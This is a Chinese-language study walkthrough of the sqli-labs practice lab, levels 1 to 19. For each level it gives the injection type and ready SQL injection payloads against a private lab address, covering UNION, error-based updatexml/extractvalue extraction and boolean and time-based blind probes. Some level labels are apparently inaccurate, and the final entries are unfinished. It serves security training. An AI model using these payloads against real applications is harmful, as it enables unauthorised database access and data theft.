sqli解题思路

**

sqli-labs解题思路

**

小白开始重新学习sqli

• 1关：

单引号，字符串，错误注入，联合注入
http://172.16.13.33/sqli/Less-1/?id=1’ and 1=1–+
接着进行联合注入

• 2关：

整型，报错，联合注入
http://172.16.13.33/sqli/Less-2/?id=1 and 1=2 整型可以不用加注释
后进行联合注入

• 3关

：
错误，单引号+括号，字符
http://172.16.13.33/sqli/Less-3/?id=1’) and 1=1–+
后进行联合查询套路

• 4关

：
错误，双引号+括号，字符
http://172.16.13.33/sqli/Less-4/?id=1") and 1=1 --+
http://172.16.13.33/sqli/Less-4/?id=-1") union select 1,2,3–+
进行联合注入套路

• 5关：

二次注入，单引号，字符，报错注入
http://172.16.13.33/sqli/Less-5/?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1) --+
因为除了错误没有其他回显所以可以用报错注入

• 6关：

字符，双引号，二次注入
http://172.16.13.33/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+
后用报错注入

• 7关：

字符，文件

• 8关：

单引号，布尔盲注
http://172.16.13.33/sqli/Less-8/?id=1’ and length(database())>7–+
http://172.16.13.33/sqli/Less-8/?id=1’ and substr(database(),1,1)=‘s’–+
进行布尔盲注

• 9关：

单引号，时间盲注
http://172.16.13.33/sqli/Less-9/?id=1’ and if(substr(database(),1,1)=‘s’,sleep(4),1) --+
加burpsuite进行盲注

• 10关：

双引号，时间盲注
http://172.16.13.33/sqli/Less-10/?id=1" and if(substr(database(),1,1)=‘s’,sleep(4),1) --+

• 11关：

错误，字符，单引号
admin’ and 1=1#
admin’ order by 5 #
后面用套路进行联合注入

• 12关：

错误，双引号+括号，字符
1" and 1=1 and 1"
前闭合，中间查询，后面报错，应该是这样没错了，实际测试没问题，可以回显，接下来就再concat()中构造查询语句：用错误查询
admin" and updatexml(1,concat(0x7e,database(),0x7e),1) and"
admin" and updatexml(1,concat(0x7e,length(database()),0x7e),1) and"

• 13关：

二次注入，单引号，字符
admin’) and 1=1–+
admin’) and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin’) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)#
后面用经典错误注入

• 14关：

二次注入，单引号，字符
admin" and 1=1#
admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)# #
后面用错误注入

1’ order by 6#
报错注入：1" and updatexml(1,concat(0x7e,database(),0x7e),1) #
时间盲注：
判断条件：1’ or sleep(5)#如果为时间盲注则延迟
admin’and if(substr(database(),1,1)=‘s’,sleep(5),1)#
admin’and if((substr((select database()),1,1)=‘s’),sleep(5),1)#

• 15关：

盲注
admin’ and substr(database(),1,1)=‘s’#
用布尔盲注

• 16关:

双引号+括号，时间/布尔盲注
admin") and 1=1#
admin") and length(database())>9#

• 17关：

字符，错误注入，单引号
报错型注入，单引号，注释符可用
admin’) and 1=1#
admin" and 1=1#
admin’ and extractvalue(1,concat(0x7e,database(),0x7e),1)#
admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)–+

最终版：
name输入：admin
password输入：admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)#
且注释一定用#

• 18关：

头部注入，错误
http头注入,当在User-Agent后面加上\时就会报错，是单引号闭合情况？？？？、

• 19关：

头注入，错误，文件
还没做完，后面慢慢补。